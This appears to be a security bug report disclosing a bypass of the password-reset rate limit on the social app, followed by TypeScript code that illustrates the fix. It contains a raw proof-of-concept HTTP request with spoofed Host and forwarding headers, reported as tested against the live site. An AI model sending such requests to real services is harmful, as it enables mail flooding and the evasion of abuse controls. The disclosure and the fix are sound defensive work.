social-app
Rate Limit Bypassed For Forget Password & Others
Steps to Reproduce
- Sending a request for forgot password has a rate limit of 15 attempts, but this can be bypassed.
- Trigger forgot password and intercept the request in Burp Suite or whatever proxy you use. Send the request to Repeater and resend it 15 times; you will see that the HTTP header Ratelimit-Remaining is being consumed, but changing this Host: bsky.app header to any other URL can probably bypass that limitation.
POC - Sending a request like this can easily bypass such limits.

```http
POST /xrpc/com.atproto.server.requestPasswordReset HTTP/2
Host: aaabing.com
X-Forwarded-For: aaaabing.com
X-Forwarded-Host: aaaabing.com
X-Client-Ip: aaaalocalhost
User-Agent: aaaaaaaa
Content-Type: application/json
Content-Length: 35

{"email":"[email protected]"}
```
This is a real live POC tested on the main site.
I sent 23 requests in 13 seconds and I got all the mails, as I have described above.
Thanks!
What platform(s) does this occur on?
iOS, Android, Web (Desktop), Web (Mobile)
Device Info
No response
What version of the app are you using?
latest
Additional Information
I like finding security issues in systems, so yeah. Looking forward to hearing from you. Don't forget to give hall of fame or credit to me: name - Chirag Artani, URL - Chirag Artani
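The bypass described in the steps above works when the limiter keys its bucket on a value the sender controls (Host, X-Forwarded-For, X-Client-Ip). The following is an added illustration of the defensive fix, not code from social-app or the atproto PDS: the per-client key comes from the observed peer address (or the hop a trusted proxy appended), and a second bucket is keyed on the target mailbox. The trusted-proxy address, header names and traffic are constructed for the example.

```typescript
type HeaderMap = Record<string, string>;
interface ResetRequest {
  peerIp: string;          // TCP peer address observed by the server, not taken from any header
  headers: HeaderMap;      // header names lower-cased
  body: { email: string };
}

// Assumption: addresses of reverse proxies that are allowed to append X-Forwarded-For.
const TRUSTED_PROXIES = new Set<string>(["10.0.0.1"]);

// Identity used for the per-client bucket. Host, X-Forwarded-Host and X-Client-Ip are
// never consulted; X-Forwarded-For is honoured only when a trusted proxy sent it, and
// then only its rightmost hop (the one that proxy itself appended).
function clientKey(req: ResetRequest): string {
  if (!TRUSTED_PROXIES.has(req.peerIp)) return req.peerIp;
  const hops = (req.headers["x-forwarded-for"] ?? "")
    .split(",").map((h) => h.trim()).filter((h) => h.length > 0);
  return hops.length > 0 ? hops[hops.length - 1] : req.peerIp;
}

class ResetLimiter {
  private counts = new Map<string, number>();
  private limit: number;
  constructor(limit: number) { this.limit = limit; }
  // Two independent buckets: one per client identity, one per target mailbox, so
  // neither header spoofing nor rotating source addresses yields unlimited reset mails.
  allow(req: ResetRequest): boolean {
    const keys = [`ip:${clientKey(req)}`, `email:${req.body.email.trim().toLowerCase()}`];
    if (keys.some((k) => (this.counts.get(k) ?? 0) >= this.limit)) return false;
    for (const k of keys) this.counts.set(k, (this.counts.get(k) ?? 0) + 1);
    return true;
  }
}

// Constructed traffic modelled on the report: one peer resends the reset request with a
// different Host / X-Forwarded-For on every attempt. Returns how many got through.
function simulate(attempts: number, limit: number): number {
  const limiter = new ResetLimiter(limit);
  let delivered = 0;
  for (let i = 0; i < attempts; i++) {
    const req: ResetRequest = {
      peerIp: "203.0.113.7",
      headers: { host: `aaa${i}bing.com`, "x-forwarded-for": `198.51.100.${i}`, "x-client-ip": "localhost" },
      body: { email: "victim@example.com" },
    };
    if (limiter.allow(req)) delivered++;
  }
  return delivered;
}
```

With this keying, `simulate(23, 15)` lets exactly 15 requests through; the remaining 8 are refused regardless of the header values sent.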